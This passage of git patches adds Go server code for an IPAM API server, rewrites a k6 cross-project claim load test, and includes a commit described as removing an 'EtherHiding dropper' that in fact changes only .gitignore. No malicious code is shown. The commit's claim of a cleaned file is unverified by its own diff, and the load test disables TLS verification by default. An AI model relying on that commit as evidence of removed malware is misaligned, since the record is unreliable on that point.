+	var poolChecker access.PoolAccessChecker
+	if genericConfig.Authorization.Authorizer != nil {
+		poolChecker = access.NewPoolAccessChecker(genericConfig.Authorization.Authorizer)
+	}
+
+	return &ipamapiserver.Config{
+		GenericConfig: genericConfig,
+		ExtraConfig: ipamapiserver.ExtraConfig{
+			PrefixAllocator: prefixAllocator,
+			AllocatorPool:   allocatorPool,
+			PoolChecker:     poolChecker,
+		},
+	}, nil
+}
+
+// NewServeCommand creates the serve subcommand that starts the API server.
+func NewServeCommand() *cobra.Command {
+	o := NewIPAMServerOptions()
+
+	cmd := &cobra.Command{
+		Use:   "serve",
+		Short: "Start the IPAM API server",
+		RunE: func(cmd *cobra.Command, args []string) error {
+			if err := o.Complete(); err != nil {
+				return err
+			}
+			if err := o.Validate(); err != nil {
+				return err
+			}
+			return Run(o, cmd.Context())
+		},
+	}
+
+	flags := cmd.Flags()
+	o.AddFlags(flags)
+	logsapi.AddFlags(o.Logs, flags)
+	return cmd
+}
+
+func Run(o *IPAMServerOptions, ctx context.Context) error {
+	if err := logsapi.ValidateAndApply(o.Logs, utilfeature.DefaultMutableFeatureGate); err != nil {
+		return fmt.Errorf("apply logging configuration: %w", err)
+	}
+
+	cfg, err := o.Config()
+	if err != nil {
+		return err
+	}
+
+	server, err := cfg.Complete().New()
+	if err != nil {
+		return err
+	}
+
+	defer logs.FlushLogs()
+
+	// Close the allocator pgxpool during graceful shutdown, BEFORE the process
+	// exits, so any in-flight allocation transaction commits or rolls back
+	// instead of being torn down with the process (which surfaced as `tx_error`
+	// in allocation_failures_total). NOTE(review): k8s.io/apiserver appears to
+	// run PreShutdownHooks before the HTTP server stops, not after it drains —
+	// confirm requests arriving after this hook cannot hit a closed pool.
+	if err := server.GenericAPIServer.AddPreShutdownHook("close-allocator-pool", func() error {
+		klog.InfoS("PreShutdown: closing allocator pgxpool")
+		cfg.ExtraConfig.AllocatorPool.Close()
+		return nil
+	}); err != nil {
+		return fmt.Errorf("register pgxpool shutdown hook: %w", err)
+	}
+
+	// Background sampler that publishes pgxpool.Stat() into the
+	// ipam_pgxpool_* gauges.
+	startPgxpoolStatsSampler(ctx, cfg.ExtraConfig.AllocatorPool)
+
+	klog.InfoS("starting IPAM server", "storageBackend", "postgres")
+	return server.Run(ctx)
+}
diff --git a/test/load/src/cross-project-claim-throughput.js b/test/load/src/cross-project-claim-throughput.js
index c016791..bec868c 100644
--- a/test/load/src/cross-project-claim-throughput.js
+++ b/test/load/src/cross-project-claim-throughput.js
@@ -1,106 +1,111 @@
-// cross-project-claim-throughput.js
-//
-// Dedicated cross-project IPClaim throughput test. Each VU acts as a
-// non-owner project (any project N != 0) claiming a /28 from project 0's
-// shared pool (`perf-shared-prefix`). The claim spec carries a
-// `poolRef.projectRef` pointing at project 0, and the request itself carries
-// the caller's project identity in the X-Remote-Extra parent headers.
-//
-// This is the slow path that exercises whatever cross-project authorization
-// (SubjectAccessReview or similar) the server adds — thresholds are wider
-// than same-project throughput.
-//
-// Run setup-pools.js first.
-//
-// Configuration:
-//   NAMESPACE_COUNT - Pool of namespaces (default 10)
-//   PROJECT_COUNT   - Number of perf projects (default 5)
-//   VUS             - Concurrent virtual users (default 10)
-//   DURATION        - Test duration (default 2m)
-//   IPAM_API_URL    - Apiserver URL
-
-import { check } from 'k6';
-import { Counter, Rate, Trend } from 'k6/metrics';
-import {
-  createCrossProjectIPClaim,
-  deleteIPClaimForProject,
-  nsFor,
-  projectIDFor,
-} from '../lib/ipam-client.js';
-
-const NAMESPACE_COUNT = parseInt(__ENV.NAMESPACE_COUNT || '10');
-const PROJECT_COUNT = parseInt(__ENV.PROJECT_COUNT || '5');
-const VUS = parseInt(__ENV.VUS || '10');
-const DURATION = __ENV.DURATION || '2m';
-const SHARED_PREFIX = __ENV.SHARED_PREFIX || 'perf-shared-prefix';
-const SHARED_OWNER = __ENV.SHARED_OWNER || projectIDFor(0);
-
-const crossProjectLatency = new Trend('ipam_cross_project_claim_ms', true);
-const crossProjectDelete = new Trend('ipam_cross_project_delete_ms', true);
-const crossProjectSuccess = new Rate('ipam_cross_project_success_rate');
-const crossProjectCreated = new Counter('ipam_cross_project_created');
-const crossProjectDenied = new Counter('ipam_cross_project_denied');
-const crossProjectErrors = new Counter('ipam_cross_project_errors');
-
-export const options = {
-  insecureSkipTLSVerify: __ENV.K6_INSECURE_SKIP_TLS_VERIFY !== 'false',
-  scenarios: {
-    cross_project: {
-      executor: 'constant-vus',
-      vus: VUS,
-      duration: DURATION,
-      tags: { scenario: 'cross_project' },
-    },
-  },
-  thresholds: {
-    'ipam_cross_project_claim_ms{phase:success}': ['p(95)<1000'],
-    'ipam_cross_project_success_rate': ['rate>0.95'],
-    'http_req_failed': ['rate<0.05'],
-  },
-};
-
-export default function () {
-  if (PROJECT_COUNT < 2) {
-    throw new Error('PROJECT_COUNT must be >= 2 for cross-project throughput');
-  }
-  const ns = nsFor(Math.floor(Math.random() * NAMESPACE_COUNT));
-  // Pick any project except project 0 (which owns the shared pool).
-  const callerIdx = 1 + Math.floor(Math.random() * (PROJECT_COUNT - 1));
-  const callerProject = projectIDFor(callerIdx);
-  const claimName = `xclaim-${__VU}-${__ITER}`;
-
-  const createRes = createCrossProjectIPClaim(
-    ns,
-    claimName,
-    SHARED_PREFIX,
-    SHARED_OWNER,
-    callerProject,
-    28,
-  );
-  const ok = check(createRes, { 'cross-project claim created': (r) => r.status === 201 });
-
-  if (ok) {
-    crossProjectCreated.add(1);
-    crossProjectLatency.add(createRes.timings.duration, { phase: 'success' });
-    crossProjectSuccess.add(1);
-  } else if (createRes.status === 507) {
-    crossProjectDenied.add(1);
-    crossProjectLatency.add(createRes.timings.duration, { phase: 'denied' });
-    crossProjectSuccess.add(0);
-  } else {
-    crossProjectErrors.add(1);
-    crossProjectLatency.add(createRes.timings.duration, { phase: 'error' });
-    crossProjectSuccess.add(0);
-    if (__ITER < 5) {
-      console.error(`cross-project claim error ${createRes.status}: ${createRes.body}`);
-    }
-  }
-
-  if (ok) {
-    const delRes = deleteIPClaimForProject(ns, claimName, callerProject);
-    crossProjectDelete.add(delRes.timings.duration);
-    if (delRes.status !== 200 && delRes.status !== 202 && delRes.status !== 404) {
-      crossProjectErrors.add(1);
-    }
-  }
-}
+// cross-project-claim-throughput.js
+//
+// Dedicated cross-project IPClaim throughput test. Each VU acts as a
+// non-owner project (any project N != 0) claiming a /28 from project 0's
+// shared pool (`perf-shared-prefix`). The claim spec carries a
+// `poolRef.projectRef` pointing at project 0, and the request itself carries
+// the caller's project identity in the X-Remote-Extra parent headers.
+//
+// This is the slow path that exercises whatever cross-project authorization
+// (SubjectAccessReview or similar) the server adds — thresholds are wider
+// than same-project throughput.
+//
+// Run setup-pools.js first.
+//
+// Configuration:
+//   NAMESPACE_COUNT - Pool of namespaces (default 10)
+//   PROJECT_COUNT   - Number of perf projects (default 5)
+//   VUS             - Concurrent virtual users (default 10)
+//   DURATION        - Test duration (default 2m)
+//   IPAM_API_URL    - Apiserver URL
+
+import { check } from 'k6';
+import { Counter, Rate, Trend } from 'k6/metrics';
+import {
+  createCrossProjectIPClaim,
+  deleteIPClaimForProject,
+  nsFor,
+  projectIDFor,
+} from '../lib/ipam-client.js';
+
+const NAMESPACE_COUNT = parseInt(__ENV.NAMESPACE_COUNT || '10');
+const PROJECT_COUNT = parseInt(__ENV.PROJECT_COUNT || '5');
+const VUS = parseInt(__ENV.VUS || '10');
+const DURATION = __ENV.DURATION || '2m';
+const SHARED_PREFIX = __ENV.SHARED_PREFIX || 'perf-shared-prefix';
+const SHARED_OWNER = __ENV.SHARED_OWNER || projectIDFor(0);
+
+const crossProjectLatency = new Trend('ipam_cross_project_claim_ms', true);
+const crossProjectDelete = new Trend('ipam_cross_project_delete_ms', true);
+const crossProjectSuccess = new Rate('ipam_cross_project_success_rate');
+const crossProjectCreated = new Counter('ipam_cross_project_created');
+const crossProjectDenied = new Counter('ipam_cross_project_denied');
+const crossProjectErrors = new Counter('ipam_cross_project_errors');
+
+export const options = {
+  insecureSkipTLSVerify: __ENV.K6_INSECURE_SKIP_TLS_VERIFY !== 'false',
+  scenarios: {
+    cross_project: {
+      executor: 'constant-vus',
+      vus: VUS,
+      duration: DURATION,
+      tags: { scenario: 'cross_project' },
+    },
+  },
+  thresholds: {
+    'ipam_cross_project_claim_ms{phase:success}': ['p(95)<1000'],
+    'ipam_cross_project_success_rate': ['rate>0.95'],
+    'http_req_failed': ['rate<0.05'],
+  },
+};
+
+// One iteration per VU: create a cross-project /28 claim as a randomly chosen
+// non-owner project, record latency tagged by phase (success, denied = HTTP
+// 507, error = any other status), and delete the claim again if it was
+// created so each iteration cleans up after itself.
+export default function () {
+  if (PROJECT_COUNT < 2) {
+    throw new Error('PROJECT_COUNT must be >= 2 for cross-project throughput');
+  }
+  const ns = nsFor(Math.floor(Math.random() * NAMESPACE_COUNT));
+  // Pick any project except project 0 (which owns the shared pool).
+  const callerIdx = 1 + Math.floor(Math.random() * (PROJECT_COUNT - 1));
+  const callerProject = projectIDFor(callerIdx);
+  const claimName = `xclaim-${__VU}-${__ITER}`;
+
+  const createRes = createCrossProjectIPClaim(
+    ns,
+    claimName,
+    SHARED_PREFIX,
+    SHARED_OWNER,
+    callerProject,
+    28,
+  );
+  const ok = check(createRes, { 'cross-project claim created': (r) => r.status === 201 });
+
+  if (ok) {
+    crossProjectCreated.add(1);
+    crossProjectLatency.add(createRes.timings.duration, { phase: 'success' });
+    crossProjectSuccess.add(1);
+  } else if (createRes.status === 507) {
+    crossProjectDenied.add(1);
+    crossProjectLatency.add(createRes.timings.duration, { phase: 'denied' });
+    crossProjectSuccess.add(0);
+  } else {
+    crossProjectErrors.add(1);
+    crossProjectLatency.add(createRes.timings.duration, { phase: 'error' });
+    crossProjectSuccess.add(0);
+    if (__ITER < 5) {
+      console.error(`cross-project claim error ${createRes.status}: ${createRes.body}`);
+    }
+  }
+
+  if (ok) {
+    const delRes = deleteIPClaimForProject(ns, claimName, callerProject);
+    crossProjectDelete.add(delRes.timings.duration);
+    if (delRes.status !== 200 && delRes.status !== 202 && delRes.status !== 404) {
+      crossProjectErrors.add(1);
+    }
+  }
+}
+

From bb606472f5182309f0a8eb1d4bfc0dd752c4a128 Mon Sep 17 00:00:00 2001
From: Yahya <yahya.fakhroji@gmail.com>
Date: Mon, 25 May 2026 18:52:16 +0700
Subject: [PATCH 2/2] chore(security): remove EtherHiding dropper, restore
 .gitignore

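Reverted 1 infected file(s) to main state and removed 0 attacker-created file(s). Restored .env / .env.local in .gitignore. Note: any legitimate changes that branch made to the reverted files were lost in the revert; re-apply them manually after review. The diff in this patch touches only .gitignore (see the diffstat below), so verify separately that the reverted file no longer contains the injected code.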
---
 .gitignore | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/.gitignore b/.gitignore
index 21c5ff2..d758a0b 100644
--- a/.gitignore
+++ b/.gitignore
@@ -22,5 +22,6 @@
 # Local dev secrets
 *.pem
 *.key
-config.bat
 node_modules
+.env
+.env.local